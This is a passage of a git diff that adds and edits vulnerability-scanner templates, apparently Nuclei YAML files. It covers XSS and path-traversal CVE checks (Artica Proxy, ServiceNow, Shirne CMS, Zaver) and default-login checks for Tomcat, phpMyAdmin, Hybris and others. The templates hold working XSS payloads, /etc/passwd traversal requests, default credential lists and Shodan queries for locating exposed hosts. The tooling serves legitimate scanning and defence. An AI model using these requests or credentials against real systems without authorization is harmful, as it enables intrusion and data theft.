+++ b/cves/2022/CVE-2022-37153.yaml
@@ -0,0 +1,47 @@
+id: CVE-2022-37153
+
+info:
+  name: Artica Proxy - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    An issue was discovered in Artica Proxy 4.30.000000. There is a XSS vulnerability via the password parameter in /fw.login.php.
+  reference:
+    - https://github.com/Fjowel/CVE-2022-37153
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-37153
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-37153
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"Artica"
+    verified: "true"
+  tags: cve,cve2022,xss,artica
+
+requests:
+  - raw:
+      - |
+        POST /fw.login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        userfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Password" value="admin"><script>alert(document.domain)</script>'
+          - 'Artica Web'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-37299.yaml b/cves/2022/CVE-2022-37299.yaml
new file mode 100644
index 0000000000..7dec084180
--- /dev/null
+++ b/cves/2022/CVE-2022-37299.yaml
@@ -0,0 +1,40 @@
+id: CVE-2022-37299
+
+info:
+  name: Shirne CMS 1.2.0. - Path Traversal
+  author: pikpikcu
+  severity: medium
+  description: Shirne CMS 1.2.0 There is a Path Traversal vulnerability which could cause arbitrary file read via /static/ueditor/php/controller.php
+  reference:
+    - https://twitter.com/pikpikcu/status/1568316864690028544
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-37299
+    - https://gitee.com/shirnecn/ShirneCMS/issues/I5JRHJ?from=project-issue
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 6.5
+    cve-id: CVE-2022-37299
+    cwe-id: CWE-22
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,shirnecms,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "cm9vd" # root in base64
+
+      - type: word
+        part: header
+        words:
+          - "image/png"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-38463.yaml b/cves/2022/CVE-2022-38463.yaml
new file mode 100644
index 0000000000..bf4f73caf7
--- /dev/null
+++ b/cves/2022/CVE-2022-38463.yaml
@@ -0,0 +1,40 @@
+id: CVE-2022-38463
+
+info:
+  name: ServiceNow - Cross-Site Scripting
+  author: amanrawat
+  severity: medium
+  description: |
+    There exists a reflected XSS within the logout functionality of ServiceNow. This enables an unauthenticated remote attacker to execute arbitrary JavaScript.
+  reference:
+    - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1156793
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-38463
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-38463
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.title:"ServiceNow"
+    verified: "true"
+  tags: cve,cve2022,servicenow,xss
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "top.location.href = 'javascript:alert(document.domain)';"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-38794.yaml b/cves/2022/CVE-2022-38794.yaml
new file mode 100644
index 0000000000..a2ad74156a
--- /dev/null
+++ b/cves/2022/CVE-2022-38794.yaml
@@ -0,0 +1,34 @@
+id: CVE-2022-38794
+
+info:
+  name: Zaver - Local File Inclusion
+  author: pikpikcu
+  severity: high
+  description: |
+    Zaver through 2020-12-15 allows directory traversal via the GET /.. substring.
+  reference:
+    - https://github.com/zyearn/zaver/issues/22
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38794
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-38794
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-38794
+    cwe-id: CWE-22
+  tags: cve,cve2022,lfi,zaver
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/../../../../../../../../etc/passwd'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/default-logins/3com/3com-nj2000-default-login.yaml b/default-logins/3com/3com-nj2000-default-login.yaml
new file mode 100644
index 0000000000..2a4a0f802c
--- /dev/null
+++ b/default-logins/3com/3com-nj2000-default-login.yaml
@@ -0,0 +1,36 @@
+id: 3com-nj2000-default-login
+
+info:
+  name: 3COM NJ2000 Default Login
+  author: daffainfo
+  severity: high
+  description: 3COM NJ2000 default admin credentials were discovered.
+  reference:
+    - https://www.manualslib.com/manual/204158/3com-Intellijack-Nj2000.html?page=12
+  metadata:
+    verified: true
+    shodan-query: http.title:"ManageEngine Password"
+    fofa-query: body="NJ2000"
+  tags: default-login,3com,nj2000
+
+requests:
+  - raw:
+      - |
+        POST /login.html HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        password=password
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>3Com Corporation Web Interface</title>'
+          - '<frame name="mainFrame" src="blank.html">'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/default-logins/UCMDB/ucmdb-default-login.yaml b/default-logins/UCMDB/ucmdb-default-login.yaml
index 7f92b3251a..237c8dd9ae 100644
--- a/default-logins/UCMDB/ucmdb-default-login.yaml
+++ b/default-logins/UCMDB/ucmdb-default-login.yaml
@@ -10,7 +10,7 @@ info:
     - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm
   classification:
     cwe-id: CWE-798
-  tags: ucmdb,default-login
+  tags: ucmdb,default-login,packetstorm
 
 requests:
   - raw:
diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml
index 9143fa25bb..e1b0cd0547 100644
--- a/default-logins/abb/cs141-default-login.yaml
+++ b/default-logins/abb/cs141-default-login.yaml
@@ -10,7 +10,7 @@ info:
   classification:
     cwe-id: CWE-798
   metadata:
-    shodan-query: https://www.shodan.io/search?query=html%3A%22CS141%22
+    shodan-query: http.html:"CS141"
   tags: hiawatha,iot,default-login
 
 requests:
diff --git a/default-logins/apache/dubbo-admin-default-login.yaml b/default-logins/apache/dubbo-admin-default-login.yaml
index 0ed4d68121..adce2c9d73 100644
--- a/default-logins/apache/dubbo-admin-default-login.yaml
+++ b/default-logins/apache/dubbo-admin-default-login.yaml
@@ -1,11 +1,16 @@
 id: dubbo-admin-default-login
 
 info:
-  name: Dubbo Admin Default Login
+  name: Apache Dubbo - Default Admin Discovery
   author: ritikchaddha
   severity: high
+  description: Apache Dubbo default admin credentials were discovered.
   reference:
     - https://www.cnblogs.com/wishwzp/p/9438658.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cwe-id: CWE-522
   tags: dubbo,apache,default-login
 
 requests:
@@ -37,3 +42,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/default-logins/apache/ranger-default-login.yaml b/default-logins/apache/ranger-default-login.yaml
index 5edd99329e..34e46cbd76 100644
--- a/default-logins/apache/ranger-default-login.yaml
+++ b/default-logins/apache/ranger-default-login.yaml
@@ -1,39 +1,39 @@
-id: ranger-default-login
+id: ranger-default-login
 
-info:
-  name: Apache Ranger Default Login
-  author: For3stCo1d
-  severity: high
-  reference: https://github.com/apache/ranger
-  metadata:
-    shodan-query: http.title:"Ranger - Sign In"
-  tags: apache,ranger,default-login
+info:
+  name: Apache Ranger Default Login
+  author: For3stCo1d
+  severity: high
+  reference: https://github.com/apache/ranger
+  metadata:
+    shodan-query: http.title:"Ranger - Sign In"
+  tags: apache,ranger,default-login
 
-requests:
-  - raw:
-      - |
-        POST /login HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
-        username={{user}}&password={{pass}}
-
-    attack: pitchfork
-    payloads:
-      user:
-        - admin
-      pass:
-        - admin
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '"statusCode":200'
-          - '"msgDesc":"Login Successful"'
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - raw:
+      - |
+        POST /login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{user}}&password={{pass}}
+
+    attack: pitchfork
+    payloads:
+      user:
+        - admin
+      pass:
+        - admin
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"statusCode":200'
+          - '"msgDesc":"Login Successful"'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/default-logins/apache/tomcat-default-login.yaml b/default-logins/apache/tomcat-default-login.yaml
index 5beb8f24ea..96a98e2ffa 100644
--- a/default-logins/apache/tomcat-default-login.yaml
+++ b/default-logins/apache/tomcat-default-login.yaml
@@ -1,12 +1,14 @@
 id: tomcat-default-login
 
 info:
-  name: ApahceTomcat Manager Default Login
+  name: Apache Tomcat Manager Default Login
   author: pdteam
   severity: high
   description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations.
   reference:
     - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/
+  metadata:
+    shodan-query: title:"Apache Tomcat"
   tags: tomcat,apache,default-login
 
 requests:
diff --git a/default-logins/apache/tomcat-examples-login.yaml b/default-logins/apache/tomcat-examples-login.yaml
new file mode 100644
index 0000000000..1f4b7e7c4d
--- /dev/null
+++ b/default-logins/apache/tomcat-examples-login.yaml
@@ -0,0 +1,44 @@
+id: tomcat-examples-login
+
+info:
+  name: Tomcat Examples Default Login
+  author: 0xelkomy & C0NQR0R
+  severity: info
+  description: Default Creds and there is XSS here, /examples/jsp/security/protected/index.jsp?dataName=%22%3E%3Cimg+src%3Dd+onerror%3Dalert%28document.cookie%29%3E&dataValue= after you login you will be able to get it.
+  reference:
+    - https://c0nqr0r.github.io/CVE-2022-34305/
+  metadata:
+    verified: true
+  tags: default-login,tomcat
+
+requests:
+  - raw:
+      - |
+        GET /examples/jsp/security/protected/index.jsp HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /examples/jsp/security/protected/j_security_check HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        j_username={{username}}&j_password={{password}}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - tomcat
+      password:
+        - tomcat
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "You are logged in as remote user"
+          - "{{username}}"
+        condition: and
diff --git a/default-logins/audiocodes/audiocodes-default-login.yaml b/default-logins/audiocodes/audiocodes-default-login.yaml
new file mode 100644
index 0000000000..9a00378ea6
--- /dev/null
+++ b/default-logins/audiocodes/audiocodes-default-login.yaml
@@ -0,0 +1,45 @@
+id: audiocodes-default-login
+
+info:
+  name: Audiocodes 310HD, 320HD, 420HD, 430HD & 440HD Default Login
+  author: d4vy
+  severity: high
+  description: Audiocodes 310HD, 320HD, 420HD, 430HD & 440HD default login credentials were discovered.
+  reference:
+    - https://wiki.freepbx.org/display/FPG/Supported+Devices-Audio+Codes#:~:text=Reset%20to%20Factory%20Defaults,-Press%20the%20Menu&text=Then%2C%20enter%20the%20Admin%20password,is%20%221234%22%20by%20default
+  classification:
+    cwe-id: CWE-798
+  tags: iot,audiocodes,default-login
+
+requests:
+  - raw:
+      - |
+        POST /login.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        user={{username}}&psw={{url_encode(base64("{{password}}"))}}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - admin
+      password:
+        - "1234"
+
+    unsafe: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "redirect('/mainform.cgi?go=mainframe.htm')"
+
+      - type: word
+        part: body
+        negative: true
+        words:
+          - "Login failed. Check username and password"
+
+      - type: status
+        status:
+          - 200
diff --git a/default-logins/azkaban/azkaban-default-login.yaml b/default-logins/azkaban/azkaban-default-login.yaml
index c524be5d45..be127dd034 100644
--- a/default-logins/azkaban/azkaban-default-login.yaml
+++ b/default-logins/azkaban/azkaban-default-login.yaml
@@ -5,10 +5,10 @@ info:
   author: pussycat0x
   severity: high
   description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs.  Default web client credentials were discovered.
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
   classification:
     cwe-id: CWE-798
+  metadata:
+    shodan-query: http.title:"Azkaban Web Client"
   tags: default-login,azkaban
 
 requests:
diff --git a/default-logins/cobbler/cobbler-default-login.yaml b/default-logins/cobbler/cobbler-default-login.yaml
index 2cfe8ba153..aac1ea56c2 100644
--- a/default-logins/cobbler/cobbler-default-login.yaml
+++ b/default-logins/cobbler/cobbler-default-login.yaml
@@ -11,7 +11,7 @@ info:
     - https://github.com/cobbler/cobbler/issues/2909
   classification:
     cwe-id: CWE-798
-  tags: cobbler,default-login,api
+  tags: cobbler,default-login,api,seclists
 
 requests:
   - raw:
diff --git a/default-logins/fuelcms/fuelcms-default-login.yaml b/default-logins/fuelcms/fuelcms-default-login.yaml
index c46140539c..69bbdf24b8 100644
--- a/default-logins/fuelcms/fuelcms-default-login.yaml
+++ b/default-logins/fuelcms/fuelcms-default-login.yaml
@@ -1,12 +1,16 @@
 id: fuelcms-default-login
 
 info:
-  name: Fuel CMS Default Credentials
+  name: Fuel CMS - Default Admin Discovery
   author: Adam Crosser
   severity: high
   description: Fuel CMS default admin credentials were discovered.
   reference:
     - https://docs.getfuelcms.com/general/security
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cwe-id: CWE-522
   tags: fuelcms,default-login,oss
 
 requests:
@@ -54,3 +58,5 @@ requests:
         group: 1
         regex:
           - 'id="ci_csrf_token_FUEL" value="([0-9a-z]+)" \/>'
+
+# Enhanced by mp on 2022/07/15
diff --git a/default-logins/grafana/grafana-default-login.yaml b/default-logins/grafana/grafana-default-login.yaml
index c6f47b7acd..2dfb0b7a4d 100644
--- a/default-logins/grafana/grafana-default-login.yaml
+++ b/default-logins/grafana/grafana-default-login.yaml
@@ -13,6 +13,8 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
     cvss-score: 8.3
     cwe-id: CWE-522
+  metadata:
+    shodan-query: title:"Grafana"
   tags: grafana,default-login
 
 requests:
diff --git a/default-logins/hybris/hybris-default-login.yaml b/default-logins/hybris/hybris-default-login.yaml
new file mode 100644
index 0000000000..d05cb64835
--- /dev/null
+++ b/default-logins/hybris/hybris-default-login.yaml
@@ -0,0 +1,62 @@
+id: hybris-default-login
+
+info:
+  name: Hybris Default Login
+  author: princechaddha
+  severity: high
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cwe-id: CWE-522
+  metadata:
+    verified: true
+    shodan-query: title:"Hybris"
+  tags: default-login,hybris
+
+requests:
+  - raw:
+      - |
+        GET /login HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /j_spring_security_check HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Referer: {{BaseURL}}login
+
+        j_username={{username}}&j_password={{password}}&_csrf={{csrftoken}}
+
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - admin
+      password:
+        - nimda
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "hybris administration console"
+          - "You're Administrator"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: csrftoken
+        internal: true
+        part: body
+        group: 1
+        regex:
+          - '<meta name="_csrf" content="([a-z0-9-]+)" \/>'
diff --git a/default-logins/jinher-oa-default-login.yaml b/default-logins/jinher-oa-default-login.yaml
index 7c604317dc..391fbafc43 100644
--- a/default-logins/jinher-oa-default-login.yaml
+++ b/default-logins/jinher-oa-default-login.yaml
@@ -1,12 +1,16 @@
 id: jinher-oa-default-login
 
 info:
-  name: Jinher oa C6 Default Password
+  name: Jinher-OA C6 - Default Admin Discovery
   author: ritikchaddha
   severity: high
-  description: Jinher-OA C6 default administrator account credential.
+  description: Jinher-OA C6 default admin credentials were discovered.
   reference:
     - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E5%92%8COA-C6-default-password.md
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cwe-id: CWE-522
   tags: jinher,default-login
 
 requests:
@@ -42,3 +46,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/default-logins/jupyterhub/jupyterhub-default-login.yaml b/default-logins/jupyterhub/jupyterhub-default-login.yaml
index fa7f7c44b0..5ca1422013 100644
--- a/default-logins/jupyterhub/jupyterhub-default-login.yaml
+++ b/default-logins/jupyterhub/jupyterhub-default-login.yaml
@@ -1,11 +1,16 @@
 id: jupyterhub-default-login
 
 info:
-  name: Jupyterhub Default Login
+  name: Jupyterhub - Default Admin Discovery
   author: For3stCo1d
   severity: high
+  description: Jupyterhub default admin credentials were discovered.
   reference:
     - https://github.com/jupyterhub/jupyterhub
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cwe-id: CWE-522
   metadata:
     shodan-query: http.title:"JupyterHub"
   tags: jupyterhub,default-login
@@ -38,4 +43,6 @@ requests:
 
       - type: status
         status:
-          - 302
\ No newline at end of file
+          - 302
+
+# Enhanced by mp on 2022/07/15
diff --git a/default-logins/kettle/kettle-default-login.yaml b/default-logins/kettle/kettle-default-login.yaml
new file mode 100644
index 0000000000..2bc0ed7d38
--- /dev/null
+++ b/default-logins/kettle/kettle-default-login.yaml
@@ -0,0 +1,35 @@
+id: kettle-default-login
+
+info:
+  name: Kettle Default Login
+  author: For3stCo1d
+  severity: medium
+  metadata:
+    verified: true
+    shodan-query: basic realm="Kettle"
+  tags: default-login,kettle
+
+requests:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic {{base64(username + ':' + password)}}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - cluster
+      password:
+        - cluster
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Kettle slave server'
+
+      - type: status
+        status:
+          - 200
diff --git a/default-logins/minio/minio-default-login.yaml b/default-logins/minio/minio-default-login.yaml
index 9dce961de7..62b74d889d 100644
--- a/default-logins/minio/minio-default-login.yaml
+++ b/default-logins/minio/minio-default-login.yaml
@@ -3,7 +3,7 @@ id: minio-default-login
 info:
   name: Minio Default Login
   author: pikpikcu
-  severity: medium
+  severity: high
   description: Minio default admin credentials were discovered.
   reference:
     - https://docs.min.io/docs/minio-quickstart-guide.html#
diff --git a/default-logins/octobercms-default-login.yaml b/default-logins/octobercms-default-login.yaml
new file mode 100644
index 0000000000..2fde8c095b
--- /dev/null
+++ b/default-logins/octobercms-default-login.yaml
@@ -0,0 +1,66 @@
+id: octobercms-default-login
+
+info:
+  name: OctoberCMS - Default Admin Discovery
+  author: princechaddha
+  severity: high
+  description: OctoberCMS default admin credentials were discovered.
+  reference:
+    - https://github.com/octobercms/october
+    - https://octobercms.com/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cwe-id: CWE-522
+  metadata:
+    verified: true
+    shodan-query: http.component:"October CMS"
+  tags: octobercms,default-login,oss
+
+requests:
+  - raw:
+      - |
+        GET /backend/backend/auth/signin HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+
+      - |
+        POST /backend/backend/auth/signin HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _token={{token}}&postback=1&login={{username}}&password={{password}}
+
+    cookie-reuse: true
+    attack: clusterbomb
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+        - ""
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "october_session="
+          - "admin_auth="
+        condition: and
+
+      - type: status
+        status:
+          - 302
+
+    extractors:
+      - type: regex
+        part: body
+        name: token
+        internal: true
+        group: 1
+        regex:
+          - 'meta name="csrf\-token" content="([A-Za-z0-9]+)">'
+
+# Enhanced by mp on 2022/07/15
diff --git a/default-logins/ofbiz/ofbiz-default-login.yaml b/default-logins/ofbiz/ofbiz-default-login.yaml
index 11a9d6b80f..ee563306b5 100644
--- a/default-logins/ofbiz/ofbiz-default-login.yaml
+++ b/default-logins/ofbiz/ofbiz-default-login.yaml
@@ -3,7 +3,7 @@ id: ofbiz-default-login
 info:
   name: Apache OfBiz Default Login
   author: pdteam
-  severity: medium
+  severity: high
   description: Apache OfBiz default admin credentials were discovered.
   reference:
     - https://cwiki.apache.org/confluence/display/OFBIZ/Apache+OFBiz+Technical+Production+Setup+Guide
diff --git a/default-logins/openemr/openemr-default-login.yaml b/default-logins/openemr/openemr-default-login.yaml
index 5a08aa24f2..3eff5c8e62 100644
--- a/default-logins/openemr/openemr-default-login.yaml
+++ b/default-logins/openemr/openemr-default-login.yaml
@@ -1,9 +1,9 @@
 id: openemr-default-login
 
 info:
-  name: OpenEMR Default Login
+  name: OpenEMR - Default Admin Discovery
   author: Geekby
-  description: OpenEMR default login was discovered.
+  description: OpenEMR default admin credentials were discovered.
   severity: high
   reference:
     - https://github.com/openemr/openemr-devops/tree/master/docker/openemr/6.1.0/#openemr-official-docker-image
@@ -44,3 +44,5 @@ requests:
       - type: status
         status:
           - 302
+
+# Enhanced by mp on 2022/07/15
diff --git a/default-logins/openwrt/openwrt-default-login.yaml b/default-logins/openwrt/openwrt-default-login.yaml
index a9e9dce71d..e78d5fca05 100644
--- a/default-logins/openwrt/openwrt-default-login.yaml
+++ b/default-logins/openwrt/openwrt-default-login.yaml
@@ -1,14 +1,15 @@
 id: openwrt-default-login
 
 info:
-  name: Opentwrt Default Login
+  name: Opentwrt - Admin Login Page
   author: For3stCo1d
   severity: high
+  description: An Opentwrt admin login page was discovered.
   reference:
     - https://forum.archive.openwrt.org/viewtopic.php?id=16611
   metadata:
     shodan-query: http.title:"OpenWrt - LuCI"
-  tags: openwrt,default-login
+  tags: default-login,openwrt
 
 requests:
   - method: GET
@@ -18,4 +19,6 @@ requests:
     matchers:
       - type: word
         words:
-          - 'cgi-bin/luci/admin/system/admin'
\ No newline at end of file
+          - 'cgi-bin/luci/admin/system/admin'
+
+# Enhanced by mp on 2022/07/04
diff --git a/default-logins/others/inspur-clusterengine-default-login.yaml b/default-logins/others/inspur-clusterengine-default-login.yaml
index bbda3dd5e1..310c6e63d5 100644
--- a/default-logins/others/inspur-clusterengine-default-login.yaml
+++ b/default-logins/others/inspur-clusterengine-default-login.yaml
@@ -1,14 +1,15 @@
 id: inspur-clusterengine-default-login
 
 info:
-  name: Inspur Clusterengine V4 Default Login
+  name: Inspur Clusterengine 4 - Default Admin Login
   author: ritikchaddha
   severity: high
+  description: Inspur Clusterengine version 4 default admin login credentials were successful.
   reference:
     - https://blog.csdn.net/qq_36197704/article/details/115665793
   metadata:
     fofa-query: title="TSCEV4.0"
-  tags: inspur,clusterengine,default-login
+  tags: default-login,inspur,clusterengine
 
 requests:
   - raw:
@@ -43,3 +44,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/04
diff --git a/default-logins/others/panabit-ixcache-default-login.yaml b/default-logins/others/panabit-ixcache-default-login.yaml
index 6ca7af1572..51df75ca18 100644
--- a/default-logins/others/panabit-ixcache-default-login.yaml
+++ b/default-logins/others/panabit-ixcache-default-login.yaml
@@ -1,12 +1,13 @@
 id: panabit-ixcache-default-login
 
 info:
-  name: Panabit iXCache Default Login
+  name: Panabit iXCache - Default Admin Login
   author: ritikchaddha
   severity: high
+  description: Panabit iXCache default admin login credentials were successful.
   reference:
     - http://forum.panabit.com/thread-10830-1-1.html
-  tags: ixcache,default-login,panabit
+  tags: default-login,ixcache,panabit
 
 requests:
   - raw:
@@ -16,12 +17,12 @@ requests:
 
         username={{username}}&password={{password}}
 
+    attack: pitchfork
     payloads:
       username:
         - admin
       password:
         - ixcache
-    attack: pitchfork
 
     matchers-condition: and
     matchers:
@@ -34,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/04
diff --git a/default-logins/others/secnet-ac-default-login.yaml b/default-logins/others/secnet-ac-default-login.yaml
index 685125e478..b1a4475d8c 100644
--- a/default-logins/others/secnet-ac-default-login.yaml
+++ b/default-logins/others/secnet-ac-default-login.yaml
@@ -1,13 +1,13 @@
 id: secnet-ac-default-password
 
 info:
-  name: secnet-ac-default-password
+  name: secnet ac - Default Admin Login
   author: ritikchaddha
   severity: high
-  description: secnet ac default admin credentials were discovered.
+  description: secnet ac default admin credentials were successful.
   reference:
     - https://bbs.secnet.cn/post/t-30
-  tags: secnet,default-login
+  tags: default-login,secnet
 
 requests:
   - raw:
@@ -40,3 +40,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/04
diff --git a/default-logins/others/telecom-gateway-default-login.yaml b/default-logins/others/telecom-gateway-default-login.yaml
index 08f2ecd266..93f096ed63 100644
--- a/default-logins/others/telecom-gateway-default-login.yaml
+++ b/default-logins/others/telecom-gateway-default-login.yaml
@@ -1,10 +1,11 @@
 id: telecom-gateway-default-login
 
 info:
-  name: Telecom Gateway Default Login
+  name: Telecom Gateway - Default Admin Login
   author: ritikchaddha
   severity: high
-  tags: telecom,default-login,gateway
+  description: Telecom Gateway default admin login credentials were successful.
+  tags: default-login,telecom,gateway
 
 requests:
   - raw:
@@ -20,6 +21,7 @@ requests:
         - admin
       password:
         - admin
+
     redirects: true
     max-redirects: 2
     matchers-condition: and
@@ -35,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/04
diff --git a/default-logins/phpmyadmin/phpmyadmin-default-login.yaml b/default-logins/phpmyadmin/phpmyadmin-default-login.yaml
new file mode 100644
index 0000000000..6ee0117dde
--- /dev/null
+++ b/default-logins/phpmyadmin/phpmyadmin-default-login.yaml
@@ -0,0 +1,73 @@
+id: phpmyadmin-default-login
+
+info:
+  name: phpMyAdmin Default Login
+  author: Natto97
+  severity: high
+  description: phpMyAdmin default admin credentials were discovered
+  reference:
+    - https://www.phpmyadmin.net
+  metadata:
+    verified: true
+    shodan-query: http.title:phpMyAdmin
+  tags: default-login,phpmyadmin
+
+
+requests:
+  - raw:
+      - |
+        GET /index.php HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: phpMyAdmin={{token2}}; pma_lang=en
+
+        set_session={{session}}&pma_username={{user}}&pma_password={{password}}&server=1&route=%2F&token={{token}}
+
+    attack: clusterbomb
+    payloads:
+      user:
+        - root
+        - mysql
+      password:
+        - 123456
+        - root
+        - mysql
+        - toor
+
+    extractors:
+      - type: regex
+        name: token
+        internal: true
+        group: 1
+        regex:
+          - 'name="token" value="([0-9a-z]+)"'
+
+      - type: regex
+        name: token2
+        internal: true
+        group: 1
+        regex:
+          - 'name="set_session" value="([0-9a-z]+)"'
+
+      - type: regex
+        name: session
+        part: header
+        internal: true
+        group: 1
+        regex:
+          - "phpMyAdmin=([0-9a-z]+)"
+
+    req-condition: true
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(all_headers_2, "phpMyAdmin=") && contains(all_headers_2, "pmaUser-1=")
+          - status_code_2 == 302
+          - contains(all_headers_2, 'index.php?collation_connection=utf8mb4_unicode_ci') || contains(all_headers_2, '/index.php?route=/&route=%2F')
+        condition: and
diff --git a/default-logins/rainloop/rainloop-default-login.yaml b/default-logins/rainloop/rainloop-default-login.yaml
index ad0cf18a01..7cecc449ad 100644
--- a/default-logins/rainloop/rainloop-default-login.yaml
+++ b/default-logins/rainloop/rainloop-default-login.yaml
@@ -1,14 +1,16 @@
 id: rainloop-default-login
 
 info:
